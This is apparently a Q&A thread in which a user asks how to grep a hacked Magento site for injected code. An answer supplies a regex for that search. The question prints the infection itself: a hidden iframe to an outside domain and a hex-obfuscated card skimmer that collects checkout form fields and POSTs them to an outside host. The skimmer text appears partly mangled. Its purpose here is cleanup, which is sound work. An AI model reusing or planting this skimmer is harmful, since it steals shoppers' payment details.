# how do i scan a php directory for a link

Tags: javascript, php, jquery, magento

A friend of mine asked me for help, his Magento site is infected with malware, is there an effective way or tool to scan php/ javascript directory + subdir for a specific line of code, in this case:

//]]><"iframe" src="http://web-statistika-google-now.com/?Yddv7D" width="1" height="1" frameborder="0">
(added "")
and

var _0x20f1=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74","\x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x6F\x6E\x65\x73\x74\x65\x70\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x6F\x6E\x65\x70\x61\x67\x65\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x66\x69\x72\x65\x63\x68\x65\x63\x6B\x6F\x75\x74\x7C\x6F\x6E\x65\x73\x74\x65\x70","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C\x75\x65","\x69\x64","","\x3D","\x26","\x61\x5B\x68\x72\x65\x66\x2A\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x27\x5D\x2C\x62\x75\x74\x74\x6F\x6E\x2C\x20\x69\x6E\x70\x75\x74\x2C\x20\x73\x75\x62\x6D\x69\x74\x2C\x20\x2E\x62\x74\x6E\x2C\x20\x2E\x62\x75\x74\x74\x6F\x6E","\x74\x79\x70\x65","\x74\x65\x78\x74","\x73\x6C\x65\x63\x74","\x63\x68\x65\x63\x6B\x62\x6F\x78","\x70\x61\x73\x73\x77\x6F\x72\x64","\x72\x61\x64\x69\x6F","\x63\x6C\x69\x63\x6B","\x6F\x6E\x63\x6C\x69\x63\x6B","\x61\x74\x74\x61\x63\x68\x45\x76\x65\x6E\x74","\x66\x6F\x72\x6D","\x73\x75\x62\x6D\x69\x74","\x6F\x6E\x73\x75\x62\x6D\x69\x74","\x63\x6C\x65\x61\x72","\x5B\x30\x2D\x39\x5D\x7B\x31\x33\x2C\x31\x36\x7D","\x30","\x31","\x50\x4F\x53\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x6E\x66\x6F\x70\x72\x6F\x6D\x6F\x2E\x62\x69\x7A\x2F\x6C\x69\x62\x2F\x70\x61\x79\x70\x61\x6C\x5F\x69\x63\x6F\x6E\x2E\x6A\x70\x67","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x61\x74\x61\x3D","\x26\x61\x73\x64\x3D","\x26\x69\x64\x5F\x69\x64\x3D\x6D\x61\x73\x73\x69\x6E\x73\x74\x61\x6C\x6C","\x73\x65\x6E\x64","\x73\x65\x6E\x64\x28\x29"];var snd=null;function start(){if(( new RegExp(_0x20f1[2]))_0x20f1[1]){send()}}document_0x20f1[4];function clk(){var _0xdb51x4=document_0x20f1[6];for(var _0xdb51x5=0;_0xdb51x5<_0xdb51x4[_0x20f1[7]];_0xdb51x5++){if(_0xdb51x4[_0xdb51x5][_0x20f1[8]][_0x20f1[7]]>0){var _0xdb51x6=_0xdb51x4[_0xdb51x5][_0x20f1[9]];if(_0xdb51x6==_0x20f1[10]){_0xdb51x6=_0xdb51x5};snd+=_0xdb51x4[_0xdb51x5][_0x20f1[9]]+_0x20f1[11]+_0xdb51x4[_0xdb51x5][_0x20f1[8]]+_0x20f1[12];}};}function send(){var _0xdb51x8=document_0x20f1[6];for(var _0xdb51x5=0;_0xdb51x5<_0xdb51x8[_0x20f1[7]];_0xdb51x5++){var _0xdb51x9=_0xdb51x8[_0xdb51x5];if(_0xdb51x9[_0x20f1[14]]!=_0x20f1[15]&&_0xdb51x9[_0x20f1[14]]!=_0x20f1[16]&&_0xdb51x9[_0x20f1[14]]!=_0x20f1[17]&&_0xdb51x9[_0x20f1[14]]!=_0x20f1[18]&&_0xdb51x9[_0x20f1[14]]!=_0x20f1[19]){if(_0xdb51x9[_0x20f1[4]]){_0xdb51x9_0x20f1[4]}else {_0xdb51x9_0x20f1[22]}};};var _0xdb51xa=document_0x20f1[6];for(var _0xdb51x5=0;_0xdb51x5<_0xdb51xa[_0x20f1[7]];_0xdb51x5++){if(_0xdb51xa[_0xdb51x5][_0x20f1[4]]){_0xdb51xa[_0xdb51x5]_0x20f1[4]}else {_0xdb51xa[_0xdb51x5]_0x20f1[22]}};if(snd!=null){console_0x20f1[26];var _0xdb51xb= new RegExp(_0x20f1[27]);var _0xdb51xc=_0x20f1[28];if(_0xdb51xb_0x20f1[1]){_0xdb51xc=_0x20f1[29]};var _0xdb51xd= new XMLHttpRequest();_0xdb51xd_0x20f1[32];_0xdb51xd_0x20f1[35];_0xdb51xd_0x20f1[39];console_0x20f1[26];};snd=null;setTimeout(_0x20f1[40],140);}

Any help would be highly appreciatet!

Jan

Comment: We recently had one of these at work. You could try `grep`ing for that exact string. We had backups for most of the files and then looking through the rest manually was quicker then crafting some sort of string replacement solution.

Answer (score 0):

In the root you might try

```
grep -r "var _0x[a-Z0-9]*=[\"\\x[a-Z0-9]*".*setTimeout\(.*\)\;\} .
```

That matches your current one at least. I wouldn't do find and replace with it though, unless you're really desperate.

I assumed it starts with var_0x and contains a lot of hex at the beginning, and then ends with a setTimeout call, as in your example.

At least it can help you identify potential problem files (in our case, it was all of them).